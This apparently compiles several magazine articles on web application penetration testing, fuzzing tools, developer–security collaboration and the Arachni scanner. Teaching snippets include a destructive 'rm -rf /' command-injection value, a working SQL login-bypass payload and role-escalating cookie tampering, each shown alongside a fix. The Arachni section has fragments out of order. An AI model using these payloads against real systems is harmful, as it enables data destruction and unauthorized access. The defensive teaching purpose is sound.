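        self.completed.add("A")
        return "cart reviewed"

    def step_b(self):                  # the security validation check
        self.completed.add("B")
        return "payment verified"

    def step_c(self):
        # LOGIC FLAW: should require "B" in self.completed, but only checks "A"
        if "A" not in self.completed:
            raise PermissionError("start at step A")
        return "order placed"

flow = CheckoutFlow()
flow.step_a()
print(flow.step_c())   # "order placed" -- step B was never executed
```

No scanner signature matches this; a tester has to understand what step B was supposed to guarantee.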
History has proven that software bugs, defects, and logical flaws are consistently the primary cause of commonly exploited application software vulnerabilities, which can lead to unauthorized access to systems, networks, and application information. It is also proven that most security breaches occur due to vulnerabilities within the web application layer (i.e., attacks using the HTTP/HTTPS protocols). Against such attacks, traditional security mechanisms such as firewalls and IDS provide little or no protection.
Security analyses review the critical components of a web-based portal, e-commerce application, or web services platform. Part of the analysis work is to identify vulnerabilities inherent in the code of the web application itself, regardless of the technology implemented, the back-end database, or the web server used by the application.
It's imperative to point out that web application penetration assessments should be designed based upon a defined threat model. They should also be based upon the evaluation of the integration between components (e.g., third-party components and in-house built components) and the overall deployment configuration, which represents a solid choice for establishing a baseline security assessment. Application penetration assessments serve as a cost-effective mechanism to identify a set of vulnerabilities in a given application: they expose the most likely exploitable vulnerabilities and allow testers to find similar instances of vulnerabilities throughout the code.

Figure 1: The different activities of the Pen Testing processes
How Web Application Pen Testing Works
Most web application penetration testing is carried out from security operations centers, where access to the resources under test is remote, over the Internet, using different penetration technologies. At the end of such a test, the application penetration test provides a comprehensive security assessment for various types of applications (e.g., commercial enterprise web applications, internally developed applications, web-based portals, and e-commerce applications). Figure 1 describes some of the activities that usually happen during the pen testing process, including the testing processes used to achieve the security vulnerability assessment: Application Spidering, Authentication Testing, Session Management Testing, Data Validation Testing, Web Service Testing, Ajax Testing, Business Logic Testing, Risk Assessment, and Reporting.
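Application spidering, the first activity listed above, can be sketched as a breadth-first crawl that extracts links from each page to map the application. A minimal sketch; the fetch callable stands in for an HTTP client, and the tiny in-memory "site" is fabricated for illustration.

```python
from html.parser import HTMLParser

class LinkExtractor(HTMLParser):
    """Collect href targets from anchor tags."""
    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.links.append(value)

def spider(start, fetch, limit=50):
    """Breadth-first crawl from start, returning the set of URLs visited."""
    seen, queue = set(), [start]
    while queue and len(seen) < limit:
        url = queue.pop(0)
        if url in seen:
            continue
        seen.add(url)
        parser = LinkExtractor()
        parser.feed(fetch(url))
        queue.extend(parser.links)
    return seen

# Three-page in-memory site standing in for a live target:
site = {
    "/": '<a href="/login">Login</a><a href="/about">About</a>',
    "/login": '<a href="/">Home</a>',
    "/about": "",
}
print(sorted(spider("/", site.get)))   # ['/', '/about', '/login']
```

The resulting URL map is what the later testing activities (authentication, session, data validation) iterate over.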
In conducting web penetration testing, different approaches can be used to achieve the security vulnerability assessment. Some of these approaches are:
• Zero-Knowledge Test (Black Box) – In this approach, the application security testing team does not have any inside information about the target environment, and the expected knowledge gained will be based on information that can be found in the public domain. This type of test is designed to provide the most realistic penetration test possible, since in many cases attackers start with no real knowledge of the target systems.
• Partial Knowledge Test (Gray Box) – In this approach, partial knowledge about the environment under test is gained before conducting the test.
• Source Code Analysis (White Box) – In this approach, the penetration test team has full information about the application and its source code. In such a test, the security team performs a line-by-line code review in an attempt to find any flaws that could allow attackers to take control of the application, perform a denial of service attack against it, or use such flaws to gain access to the internal network.
It's also important to point out that penetration testing can be achieved through two different types of testing:

• External Penetration Testing
• Internal Penetration Testing

Both types can be conducted with least information (black box) or with full information about the environment (white box).
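The kind of flaw a line-by-line (white box) review looks for can be as small as a single call. A minimal sketch, with fabricated helper names: the first function splices user input into a shell command line (command injection); the reviewed fix builds an argument vector so no shell ever interprets the input.

```python
import shlex

def ping_unsafe(host):
    # FLAW: user-supplied host is interpolated into a shell command string
    return "ping -c 1 " + host

def ping_safe_argv(host):
    # FIX: argument vector; the host is a single literal argument, no shell
    return ["ping", "-c", "1", host]

malicious = "example.com; rm -rf /"
# Extra tokens from the attacker's payload leak into the command line:
print(shlex.split(ping_unsafe(malicious)))
# The fixed version keeps the whole payload as one harmless argument:
print(ping_safe_argv(malicious))
```

A scanner rarely reaches code like this; a reviewer reading the source spots it immediately.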
Figure 2: The different phases of pen testing
Figure 3 shows the different procedures and steps that can be used to conduct the penetration testing. The following is a description of these steps:
• Scope and Plan – In this step, the scope of the penetration testing is identified, and the project plan and resources are defined.
• System Scan and Probe – In this step, scanning of the systems under the defined scope of the project is conducted: automated scanners examine the open ports and scan the systems to detect vulnerabilities, and the hostnames and IP addresses previously collected are used at this stage.
• Creating Attack Strategies – In this step, the testers prioritize the systems and the attack methods to be used, based on the type of system and how critical it is. Also at this stage, the penetration testing tools are selected based on the vulnerabilities detected in the previous phase.
• Penetration Testing – In this step, the exploitation of vulnerabilities using the automated tools is conducted: the attack methods designed in the previous phase are used to carry out tests such as data & service pilferage, buffer overflow, privilege escalation, and denial of service (if applicable).
• Documentation – In this step, all the vulnerabilities discovered during the test are documented; evidence of exploitation and the penetration testing findings are also recommended to be presented later within the final report.
• Improvement – The final step of the penetration testing is to provide the corrective actions for closing the discovered vulnerabilities within the systems and the web applications.
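The System Scan and Probe step above usually begins with a TCP connect scan: try each port and record which ones accept a connection. A minimal sketch; the connect function is injectable so the scan logic can be demonstrated against a simulated target (hostnames and open ports here are fabricated), while a real run would use the built-in socket path.

```python
import socket

def scan_ports(host, ports, try_connect=None):
    """Return the subset of ports that accept a TCP connection."""
    if try_connect is None:
        def try_connect(host, port):
            try:
                with socket.create_connection((host, port), timeout=1):
                    return True
            except OSError:
                return False
    return [p for p in ports if try_connect(host, p)]

# Simulated target with ports 22 and 80 open:
fake_open = {22, 80}
result = scan_ports("target.example", [21, 22, 23, 80, 443],
                    try_connect=lambda h, p: p in fake_open)
print(result)   # [22, 80]
```

Real scanners add UDP probes, banner grabbing, and timing tricks on top of this same loop.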
Web Application Testing Tools
Throughout pen testing, a specific, structured methodology has to be followed, with steps such as Enumeration, Vulnerability Assessment, and Exploitation. Some of the tools that might be used within these steps are:
• Port Scanners
• Sniffers
• Proxy Servers
• Site Crawlers
• Manual Inspection
The output from the above tools allows the security team to gather information about the environment, such as open ports, services, versions, and operating systems. The vulnerability assessment utilizes the data gathered in the previous step to uncover potential vulnerabilities in the web server(s), application server(s), database server(s), and any intermediary devices such as firewalls and load balancers. It's also important for the security team not to rely solely on the tools during the assessment phase to discover vulnerabilities: manual inspection of items such as HTTP responses, hidden fields, and HTML page sources should be part of the security assessment as well.
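Manual inspection of HTTP responses, as recommended above, often starts by pulling the server banner and any hidden form fields out of a raw response. A minimal sketch; the sample response below is fabricated.

```python
import re

def server_banner(raw_response):
    """Extract the Server header value, if present."""
    match = re.search(r"^Server:\s*(.+)$", raw_response, re.MULTILINE)
    return match.group(1).strip() if match else None

def hidden_fields(html_body):
    """List the names of hidden input fields in an HTML body."""
    pattern = r'<input[^>]*type="hidden"[^>]*name="([^"]+)"'
    return re.findall(pattern, html_body)

raw = ("HTTP/1.1 200 OK\r\n"
       "Server: Apache/2.2.14 (Unix)\r\n"
       "\r\n"
       '<form><input type="hidden" name="price" value="10"></form>')

print(server_banner(raw))    # Apache/2.2.14 (Unix)
print(hidden_fields(raw))    # ['price']
```

A hidden field like `price` carried to the client is exactly the sort of finding a tool may miss but a human recognizes as tamperable.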
Some of the areas that can be covered during the vulnerability assessment are the following:
• Input validation
• Access Control
• Authentication and Session Management (Session ID flaws) Vulnerabilities
• Cross-Site Scripting (XSS) Vulnerabilities
• Buffer Overflows
• Injection Flaws
• Error Handling
• Insecure Storage
• Denial of Service (if required)
• Configuration Management
• Business logic flaws
• SQL Injection faults
• Cookie manipulation and poisoning
• Privilege escalation
• Command injection
• Client-side and header manipulation
• Unintended information disclosure

Figure 3: Testing techniques, procedures and steps
During the assessment, testing of the above vulnerabilities is performed, except for those that could cause Denial of Service conditions, which are usually discussed beforehand. Possible options for Denial of Service testing include testing during a specific time window, testing a development system, or manually verifying the condition that may be responsible for the vulnerability. Once the vulnerability assessment is complete, the final reports, recommendations, and comments are summarized, and better solutions are suggested for the implementation process. Once the above assessments are done, the penetration test is half-way done, and the most important part of the assessment has to be delivered: the informative report that highlights all the risks found during the penetration phase.
The following are some of the commonly used tools for traditional penetration testing
Port Scanners
Such tools are used to gather information about which network services are available for connection on each target host. Port scanning tools examine or query each of the designated network ports or services on the target system. Most of these tools are able to scan both TCP and UDP ports. Another common feature of port scanners is their ability to determine the operating system type and its version number, since protocol implementations such as TCP/IP can vary in their specific responses. Configuration flexibility in port scanners serves to examine different port configurations as well as to hide from network intrusion detection mechanisms.
Vulnerability Scanners
While port scanners only produce an inventory of the types of available services, vulnerability scanners attempt to exercise vulnerabilities on their targeted systems. The main goal of vulnerability scanners is to provide an essential means of meticulously examining each and every available network service on the targeted hosts. These scanners work from a database of documented network service security defects, exercising each defect on each available service of the target hosts. Most commercial and open source scanners scan the operating system for known weaknesses and un-patched software, as well as configuration problems such as user permission management defects or problems with file access controls. Despite the fact that both network-based and host-based vulnerability scanners do little to help a web application-level penetration test, they are fundamental tools for any penetration testing. Good examples of such tools are Internet Scanner, QualysGuard, and Core Impact.
Application Scanners
Most application scanners can observe the functional behaviour of an application and then attempt a sequence of common attacks against it. Popular commercial application scanners include AppScan and WebInspect.
Web Application Assessment Proxy
Assessment proxies work by interposing themselves between the web browser used by the tester and the target web server, where data can be viewed and manipulated. Such flexibility enables different tricks to exercise the application's weaknesses and its associated components. For example, penetration testers can view all cookies, hidden HTML fields, and other data used by the web application, and attempt to manipulate their values to trick the application.
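The core trick an assessment proxy performs, rewriting a value in flight before forwarding the request, can be sketched in a few lines. The cookie names below are fabricated; a real proxy would do this interactively on intercepted traffic.

```python
from http import cookies

def tamper_cookie(cookie_header, name, new_value):
    """Parse a Cookie header, overwrite one attribute, re-serialize it."""
    jar = cookies.SimpleCookie()
    jar.load(cookie_header)
    if name in jar:
        jar[name] = new_value
    return "; ".join(f"{key}={morsel.value}" for key, morsel in jar.items())

original = "session=abc123; role=user"
tampered = tamper_cookie(original, "role", "admin")
print(tampered)   # the role attribute now claims admin privileges
```

If the server trusts the `role` value instead of re-checking authorization server-side, this single edit escalates privileges, which is exactly what the proxy lets the tester probe for.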
The penetration testing practice described above is called black box testing. Some organizations use hybrid approaches, where traditional penetration testing is combined with some level of source code analysis of the web application. Most penetration testing tools can perform these penetration testing practices; however, choosing the right tool for the job is vital for the success of the penetration process and the accuracy of the results.
The following are some of the common features that should be implemented within penetration testing tools:
• Visibility – The tool must provide the required visibility for the testing team, which can be used for the feedback and reporting of the test results.
• Extensibility – The tool should be customizable, and it must provide scripting-language or plug-in capabilities that can be used to construct customized penetration tests.
• Configurability – A configurable tool is highly recommended, to ensure the flexibility of the implementation process.
• Documentation – The tool should provide documentation that clearly explains the probes performed during the penetration testing.
• License Flexibility – A tool that can be used without specific constraints, such as a particular IP range or license limits, is a better tool than others.
Security Techniques for Web Apps
Some of the security techniques that can be implemented within the web application to eliminate vulnerabilities are:
• Sanitize the data coming from the browser – Any data sent by the browser can never be trusted (e.g., submitted form data, uploaded files, cookie data, XML, etc.). If web developers fail to sanitize the incoming data, it might lead to vulnerabilities such as SQL injection, cross-site scripting, and other attacks against the web application.
• Validate data before form submission and manage sessions – This avoids Cross-Site Request Forgery (CSRF), which can occur when a web application accepts form submission data without verifying that it came from a user web form. It is imperative for the web application to verify that the submitted form is one that the web application had produced and served.
• Configure the server in the best possible way – Network administrators have to follow guidelines for hardening web servers. Some of these guidelines are: maintain and update proper security patches, kill all redundant services and shut down unnecessary ports, confine access rights to folders and files, employ SSH (the Secure Shell network protocol) rather than telnet or FTP, and install efficient anti-malware software.
In addition to the above guidelines, it is always important to enforce strong passwords for web application users and to protect stored passwords.
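The sanitization advice above is most concrete for SQL: never splice input into a query string; use parameterized queries so the driver keeps data and code separate. A self-contained demonstration using Python's built-in sqlite3; the schema and credentials are fabricated for illustration.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")

def login_unsafe(name, password):
    # VULNERABLE: string concatenation enables the classic ' OR '1'='1 bypass
    query = ("SELECT * FROM users WHERE name = '" + name +
             "' AND password = '" + password + "'")
    return conn.execute(query).fetchall()

def login_safe(name, password):
    # SAFE: placeholders; the driver treats the input strictly as data
    query = "SELECT * FROM users WHERE name = ? AND password = ?"
    return conn.execute(query, (name, password)).fetchall()

attack = "' OR '1'='1"
print(len(login_unsafe("alice", attack)))  # 1 -> authentication bypassed
print(len(login_safe("alice", attack)))    # 0 -> injection neutralized
```

The same placeholder discipline applies to every database driver, only the placeholder syntax varies.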
Conclusion
A vulnerability assessment is the process of identifying, prioritizing, quantifying, and ranking the vulnerabilities in a system; such a process determines whether there are weaknesses or vulnerabilities in the system subjected to the assessment. Penetration testing includes all of the processes in a vulnerability assessment, plus the exploitation of the vulnerabilities found in the discovery phase.
Unfortunately, an all-clear result from a penetration test doesn't mean that an application has no problems. Penetration tests can miss weaknesses such as session forging and brute-forcing detection, and as such, implementing security throughout an application's lifecycle is an imperative process for building secure web applications.
As automated web application security tools continue to mature, automated security assessment will continue to reduce both the uncertainty of determination (i.e., false positive results) and the potential to miss some issues (i.e., false negative results).
Both automated and manual penetration testing can be used to discover critical security vulnerabilities in web applications. Currently, the automated tools can't entirely replace manual penetration testing. However, if the automated tools are used correctly, organizations can save a lot of money and time in finding a broad range of technical security vulnerabilities in web applications. Manual penetration testing can then be used to augment the automated results, particularly for the logical vulnerabilities that automated testing cannot find.
Finally, it is important to point out that, over time, manual testing for technical vulnerabilities will move from difficult to impossible as the size, scope, and complexity of web applications increase. The fact that many enterprise organizations will not be able to dedicate the time, money, and effort required to assess thousands of web applications will increase the use of automated tools rather than relying on humans to manually test these applications. Moreover, relying on human effort to test for thousands of technical vulnerabilities within these applications is subject to human error and simply can't be trusted.
BRYAN SOLIMAN
Bryan Soliman is a Senior Solution Designer currently working with the Ontario Provincial Government of Canada. He has over twenty years of Information Technology experience, with a Bachelor's degree in Engineering, a Bachelor's degree in Computer Science, and a Master's degree in Computer Science.
WHAT IS A GOOD FUZZING TOOL?
Fuzz testing is the most efficient method for discovering both known and unknown vulnerabilities in software. It is based on sending anomalous (invalid or unexpected) data to the test target – the same method that is used by hackers and security researchers when they look for weaknesses to exploit. There are no false positives: if the anomalous data causes an abnormal reaction, such as a crash in the target software, then you have found a critical security flaw.

In this article we will highlight the most important requirements in a fuzzing tool and also look at the most common mistakes people make with fuzzing.

PROPERTIES OF A GOOD FUZZING TOOL
There is an abundance of fuzzing tools available. How do you distinguish a good fuzzer? What are the qualities that a fuzzing tool should have?

Model-based test suites. Random fuzzing will certainly give you some results, but to really target the areas that are most at risk, the test cases need to be based on actual protocol models. This results in a huge improvement in test coverage and a reduction in test execution time.

Easy to use. Most fuzzers are built for security experts, but in QA you cannot expect that all testers understand what buffer overflows are. A fuzzing tool must come with all the security know-how built in, so that testers only need the domain expertise from the target system to execute tests.

Automated. Creating fuzz test cases manually is a time-consuming and difficult task. A good fuzzer will create test cases automatically. Automation is also critical when integrating fuzzing into regression testing and bug reporting frameworks.

Test coverage. Better test coverage means more discovered vulnerabilities. Fuzzer coverage must be measurable in two aspects: specification coverage and anomaly coverage.

Scalable. Time is almost always an issue when it comes to testing. The user must also have control over fuzzing parameters such as test coverage. In QA you rarely have much time for testing and therefore need to run tests fast. Sometimes you can use more time in testing and can select other test completion criteria.

Documented test cases. When a bug is found, it needs to be documented for your internal developers or for vulnerability management towards third-party developers. When there are billions of test cases, automated documentation is the only possible solution.

Remediation. All found issues must be reproduced in order to fix them. Network recording (PCAP) and automated reproduction packages help you in delivering the exact test setup to the developers so that they can start developing a fix to the found issues.

MOST COMMON MISTAKES IN FUZZING
Not maintaining proprietary test scripts. Proprietary test scripts are not rewritten even though the communication interfaces change or the fuzzing platform becomes outdated and unsupported.

Ticking off the fuzzing check-box. If the requirement for testers is to do fuzzing, they almost always choose the quick and dirty solution: random fuzzing. Test requirements should instead focus on coverage metrics to ensure that testing aims to find most flaws in the software.

Using hardware test beds. Appliance-based fuzzing tools become outdated really fast, and the speed requirements for the hardware increase each year. Software-based fuzzers are scalable in performance, can easily travel with you wherever testing is needed, and are not locked to a physical test lab.

Unprepared for the cloud. A fixed location for fuzz testing makes it hard for people to collaborate and scale the tests. Be prepared for virtual setups where you can easily copy the setup to your colleagues or upload it to cloud environments.
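The core fuzzing loop described here, send anomalous data and watch for abnormal reactions, can be sketched as a tiny mutation fuzzer. The parser under test and its flaw are fabricated for illustration; a fixed seed keeps runs reproducible, which is part of the "remediation" requirement above.

```python
import random

INTERESTING = [0x00, 0x7F, 0x80, 0xFF]   # boundary bytes that often break parsers

def mutate(sample, rng):
    """Flip one to three bytes of a valid sample to 'interesting' values."""
    data = bytearray(sample)
    for _ in range(rng.randint(1, 3)):
        data[rng.randrange(len(data))] = rng.choice(INTERESTING)
    return bytes(data)

def fuzz(parse, sample, iterations=500, seed=1234):
    """Run mutated inputs through parse; collect inputs that crash it."""
    rng = random.Random(seed)
    crashes = []
    for _ in range(iterations):
        case = mutate(sample, rng)
        try:
            parse(case)
        except Exception:
            crashes.append(case)       # document the exact failing input
    return crashes

# Toy parser with a hidden flaw: it chokes when the first byte is 0xFF.
def toy_parse(data):
    if data and data[0] == 0xFF:
        raise ValueError("unhandled frame type")

crashes = fuzz(toy_parse, b"PING")
print(len(crashes) > 0)   # the fuzzer finds the flaw
```

Model-based fuzzers improve on this by mutating within a protocol grammar instead of flipping raw bytes, which is why they reach deeper code paths in less time.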
Developers are from Venus, Application Security guys from Mars

We know that Application Security people talk a different language than developers do, whenever we publish a report, make an assessment, or review a software architecture from a security point of view. There is a gap between developers and the Application Security group. The two teams must interact with each other to reach the same goal of building secure code.

Application Security members are considered like the tax man asking for money. Security is sometimes seen as a cost to pay in order to get an application into Production. Actually, it is a little of everyone's fault. Since Security people and Developers usually do not talk the same language, it is difficult for the two groups to work together and give each other the necessary attention and feedback that they deserve. Let's take a step back for a minute and let me clarify what I mean about language and communication. Consider this scenario: the Marketing department has asked for a brand new web portal that shows new products from the ACME corporation. Marketers usually do not know anything about technology; they just want to hit the market with an aggressive campaign on the new product line. Marketers might ask the developers for something like Give us the latest Web 2.0, Social-enabled website to impress the customers. Plus, they would like it as soon as possible, and they provide a deadline that the developers must keep. The developers brainstorm the idea, write out some specifications and requirements, start prototyping their ideas, and eventually begin coding. They are under pressure to meet the deadline, and management usually presses even more. Security is slowly pushed aside so that coding and production can meet the deadline. Most software architecture is not designed with security in mind, and project Gantt charts usually include no security checkpoints for code testing, nor do they allow time for security fixes or remediation.

Developers are pushed to code the application so that they can meet the deadline. Acceptance tests and functionality tests are passed, and the application is almost ready for deployment when someone recalls something about security: Hey, we need to get this on-line. So we need to open up the firewall to allow access to it.

The Security Application group asks for additional information about the application and requests documentation of how the application was built. They do not see it from the developers' point of view of meeting the deadline that Management has imposed on them. On the other side, developers do not see the problem from a security perspective: what risks to the IT infrastructure will potentially be exposed if someone breaks into the new application?

One solution to the problem is to execute a penetration test on the application and look at the results. Then security is happy, since they can test the application, and developers are happy once the penetration test report is complete. Many times a penetration test report contains recommended mitigation steps that impose additional time constraints on the application delivery. Reports usually contain just the symptom, for example statements like a SQL injection is possible, not the real root cause: a parameter taken from a config file is not sanitized before utilization. The report does not contain all of the information necessary to solve the problems at first glance. The developers cannot mitigate all of the issues in time to meet the deadline, so many times bug fixes are prolonged or pushed into the next revision of the software, and in some cases they are never fixed. Another problem arises when the two groups talk to each other at the end of the whole process using a non-common-ground language that further confuses or annoys everyone and pushes the groups even further apart.

Communications Breakdown: You Give Me The Report
Penetration test reports are most of the time useless from the developers' point of view, because they do not give specific information that pinpoints where the problem is. This is very ironic, because the developers need to take full advantage of the security report, since most remediation consists of source code fixes.

Security issues found in penetration testing are not for the faint of heart. There can be a lot of high-level security issues, grouped by the OWASP Top 10 (most of the time), with some generic remediation steps such as implement an input filtering policy. This information may not mean anything to a source code developer. Developers want to know the module, class, or line where the problem exists so that they can fix it. Given enough time, developers can eventually determine where the problem exists, but usually they do not have the time to look through all of the code to find every testing error and still get the application into production.

Let's Close the Gap
What we need to do is define a common ground where security can be integrated into source code somewhat painlessly. Security should be transparent from the development team's point of view. This can be achieved by:

• Creating a development framework that has security built into it
• Designing an API to be used by the application

Putting security into the framework is the Rails approach. Rails' developers added a security facility inside the framework's helpers, so developers inherit secure input filtering, SQL injection protection, and a CSRF protection token. This is a huge step forward in assisting developers with this problem. This methodology works when a programming language community provides a secure framework for developing web applications. This is true for the Ruby community (other frameworks, like Sinatra, have some security facilities as well). In the Java programming language community there are a lot of non-standardized frameworks available for Java developers, but which is the right one to use to ensure secure code development?

.NET has one single monolithic framework, and Microsoft has invested money in security, and it seems they did it the right way, but it is not Open Source, so professionals cannot contribute. A generic framework-based solution is not feasible. What about APIs? Developers do know how to use APIs, and having security controls embedded in a single library can save the day when writing source code. That is why OWASP introduced the ESAPI project: to provide a set of APIs that developers can use to embed security controls into their code.

The requested effort is minimal compared to translating an implement a filter policy statement into running code, and you (as a security professional) now speak the same language as the developer. This is a win-win approach. The security team and the application developers are now on the same page, and everyone is happy. There is a third approach I will cover in a follow-up article: the BDD approach. BDD is the acronym for Behavior Driven Development, which means that you start by writing test cases (taking examples from the Ruby on Rails world, you write test beds most of the time using rspec and cucumber) modeling how the source code has to behave according to the documentation or requirements specification. Initially, when you execute the test cases against your application, there will probably be failures that need to be corrected. The idea is straightforward: using the WAPT activity, instead of an implement a filtering policy statement, you produce a set of rspec/cucumber scenarios modeling how the source code should deal with malformed input. Then the development team starts correcting the code until it passes all of the test cases; when testing is complete and all tests pass, it means your source code has implemented a filtering policy. How has development changed? A new approach has been created to ensure that the developers implement your remediation statement. Now the developers understand how to handle malformed entry statements and why they are so important to the Application Security group.

In the next article we will see how to write some security tests using the BDD approach in order to help a generic Java developer deal with cross-site scripting vulnerabilities.

PAOLO PEREGO
Paolo Perego is an application security specialist interested in fixing the code he just broke with a web application penetration test. He's interested in code review, and he's working on his own hybrid analysis tool called aurora. He loves Ruby on Rails, kernel hacking, playing guitar, and practicing the Tae kwon-do ITF martial art. He's a husband and a daddy, and a startup wannabe. You may want to check out Paolo's blog or look at his about me page.
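The BDD idea from the article above, turning each pen test finding into an executable scenario the code must pass, uses rspec and cucumber in the Ruby world; the same shape can be approximated in plain Python. A minimal sketch: the filter under test and the scenario names are fabricated for illustration.

```python
import html

def sanitize(user_input):
    """The remediation under development: an output-encoding filter."""
    return html.escape(user_input, quote=True)

# "Given a malicious parameter, when it is rendered, then no script survives"
def scenario_script_tag_is_neutralized():
    rendered = sanitize("<script>alert(1)</script>")
    assert "<script>" not in rendered
    assert rendered == "&lt;script&gt;alert(1)&lt;/script&gt;"

# "Given an attribute-breakout payload, then quotes are encoded"
def scenario_attribute_breakout_is_neutralized():
    rendered = sanitize('" onmouseover="alert(1)')
    assert '"' not in rendered

scenario_script_tag_is_neutralized()
scenario_attribute_breakout_is_neutralized()
print("all scenarios pass")
```

Each failing scenario is the executable counterpart of one line in the pen test report; developers fix code until the suite is green instead of interpreting a prose remediation statement.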
WEB APP VULNERABILITIES
Arachni is not a so-called inspection proxy, such as the popular commercial but low-cost Burp Suite or the freeware Zed Attack Proxy of the Open Web Application Security Project (OWASP). These tools are really meant to be used by a skilled consultant doing manual investigations of the application.

Arachni can be better compared with commercial online scanners, which are directed at the application and produce a report with no further interaction from the user.
Every security consultant or hacker must understand the strengths and weaknesses of his or her toolset and must choose the best combination of tools for the job at hand. Is Arachni worthwhile?

Time for an in-depth review.
Under the Hood
According to the documentation, Arachni offers the following:

• Simplicity: everything is simple and straightforward, from a user's or component developer's point of view
• A stable, efficient and high-performance framework: Arachni allows custom modules, reports and plug-ins. Developers can easily use the advanced framework features without knowing the nitty-gritty details.

Pulling the Legs of Arachni
Arachni is a fire-and-forget (or point-and-shoot) web application vulnerability scanner developed in Ruby by Tasos "Zapotek" Laskos. It got quite a good score for the detection of Cross-Site Scripting and SQL injection issues in the recently publicised vulnerability scanner benchmark by Shay Chen.

Table 1. Overview of the audit and reconnaissance modules included with Arachni
Audit Modules:
• SQL injection
• Blind SQL injection using rDiff analysis
• Blind SQL injection using timing attacks
• CSRF detection
• Code injection (PHP, Ruby, Python, JSP, ASP.NET)
• Blind code injection using timing attacks (PHP, Ruby, Python, JSP, ASP.NET)
• LDAP injection
• Path traversal
• Response splitting
• OS command injection (*nix, Windows)
• Blind OS command injection using timing attacks (*nix, Windows)
• Remote file inclusion
• Unvalidated redirects
• XPath injection
• Path XSS
• URI XSS
• XSS
• XSS in event attributes of HTML elements
• XSS in HTML tags
• XSS in HTML script tags

Recon Modules:
• Allowed HTTP methods
• Back-up files
• Common directories
• Common files
• HTTP PUT
• Insufficient Transport Layer Protection for password forms
• WebDAV detection
• HTTP TRACE detection
• Credit card number disclosure
• CVS/SVN user disclosure
• Private IP address disclosure
• Common backdoors
• .htaccess LIMIT misconfiguration
• Interesting responses
• HTML object grepper
• E-mail address disclosure
• US Social Security Number disclosure
• Forceful directory listing
talks to one or more dispatchers that will perform the scanning job. New in the latest experimental branch is that dispatchers can communicate with each other and share the load (the Grid).
This is great if you want to speed up the scan, or if you want to execute some crazy things like running
We can vouch that Arachni attains both its simplicity and performance goals. Since the framework is still under heavy development, stability is sometimes lacking, but at no time did this interfere with our vulnerability assessments.
Arachni is highly modular, both from an architecture and a source code point of view. The Arachni client (web or command-line) connects to one or more dispatchers that will execute the scan. The connection to these dispatchers can be secured by SSL encryption and certificate-based authentication. One dispatcher can handle multiple clients. Multiple dispatchers can share a load and communicate with each other to optimise and speed up the scanning process.
The asynchronous scanning engine supports both HTTP and HTTPS and has pause/resume functionality. Arachni supports upstream proxies (SOCKS4, SOCKS4A, SOCKS5, HTTP/1.1 and HTTP/1.0) as well as proxy authentication.
The scanner can authenticate against the web application using form-based authentication, HTTP Basic and Digest authentication, and NTLM.
At the start of every scan, a crawler will try to detect all pages. In version 0.3 this was optional, but since version 0.4 the crawler always runs at the start of the scan. The crawler has filters for redundant pages, based on regular expressions and counters, and can include or exclude URLs based on regular expressions. Optionally, the crawler can also follow subdomains. There is also an adjustable link count and redirect limit.
The HTML parser can extract forms, links, cookies and headers. It gracefully handles badly written HTML thanks to a combination of regular-expression analysis and the Nokogiri HTML parser.
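The regular-expression pass is what makes the parser tolerant of malformed markup. As a toy illustration (plain Ruby, not Arachni's actual code), link targets can still be recovered from HTML whose tags are never closed:

```ruby
# Badly written HTML: the anchor tags are never closed.
html = '<a href="/admin">Admin<a href="/login">Login'

# A regular-expression pass still recovers the href targets.
links = html.scan(/href=["']([^"']+)["']/).flatten
puts links.inspect  # => ["/admin", "/login"]
```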
Arachni offers a very simple and easy-to-use module API, enabling a developer to access helper audit methods and write custom modules in a matter of minutes. Arachni already includes a large number of modules: audit modules and reconnaissance (recon) modules. Table 1 provides an overview.
Arachni offers report management. The following reports can be created: standard output, HTML, XML, TXT, YAML serialization, and the Metareport, providing Metasploit integration for automated and assisted exploitation.
Arachni has many built-in plug-ins that have direct access to the framework instance. Plug-ins can be used to add any functionality to Arachni. Table 2 provides an overview of the currently available plug-ins.

Installation
Arachni consists of client-side (web or shell) and server-side functionality (the dispatchers). A client
Table 2. Included Arachni plug-ins. Plug-ins have direct access to the framework instance and can be used to add any functionality to Arachni.
Plug-ins:
• Passive Proxy: analyses requests and responses between the web application and the browser, assisting in AJAX audits, logging in and/or restricting the scope of the audit
• Form-based AutoLogin: performs an automated login
• Dictionary attacker: performs dictionary attacks against HTTP authentication and form-based authentication
• Profiler: performs taint analysis with benign inputs and response-time analysis
• Cookie collector: keeps track of cookies while establishing a timeline of the changes
• Healthmap: generates a sitemap showing the health (vulnerability present or not) of each crawled/audited URL
• Content-types: logs content-types of server responses, aiding in the identification of interesting (possibly leaked) files
• WAF (Web Application Firewall) Detector: establishes a baseline of normal behaviour and uses rDiff analysis to determine if malicious inputs cause any behavioural changes
• Metamodules: loads and runs high-level meta-analysis modules pre/mid/post-scan:
  • AutoThrottle: dynamically adjusts HTTP throughput during the scan for maximum bandwidth utilization
  • TimeoutNotice: provides a notice for issues uncovered by timing attacks when the affected audited pages returned unusually high response times to begin with. It also points out the danger of DoS (Denial-of-Service) attacks against pages that perform heavy-duty processing
  • Uniformity: reports inputs that are uniformly vulnerable across a number of pages, hinting at the lack of a central point of input sanitization
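The rDiff analysis mentioned for the WAF Detector (and used by the blind SQL injection module) boils down to a behavioural comparison. A hypothetical simplification, not Arachni's implementation:

```ruby
# Request the page twice with benign input to establish a stable
# baseline; only if the baseline is stable AND a malicious input
# produces a different response do we report a behavioural change.
def behaviour_changed?(baseline, control, injected)
  baseline == control && injected != baseline
end

puts behaviour_changed?('<p>1 result</p>', '<p>1 result</p>', '<p>blocked</p>')  # => true
puts behaviour_changed?('<p>1 result</p>', '<p>2 results</p>', '<p>blocked</p>') # => false
```

The second call returns false because an unstable page (the control request already differs from the baseline) would otherwise produce false positives.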
your dispatchers in multiple geographic zones, thanks to Amazon Elastic Compute Cloud (EC2) or similar cloud providers.
Let's get our hands dirty and start with the experimental branch (currently at version 0.4), so we can work with the latest and greatest functionality. Another benefit is that this experimental version can work under Windows.
Installation under Linux is quick and easy, but a Windows set-up requires the installation of Cygwin first. Cygwin is a collection of tools that provide a Linux-like environment on Windows, as well as providing a large part of the Linux APIs. Another possibility is to run it natively on Windows using MinGW (Minimalist GNU for Windows), but at this moment there are too many problems involved with that.

Linux
Installation under Linux is quite straightforward. Open your favourite shell and execute the commands in Listing 1.
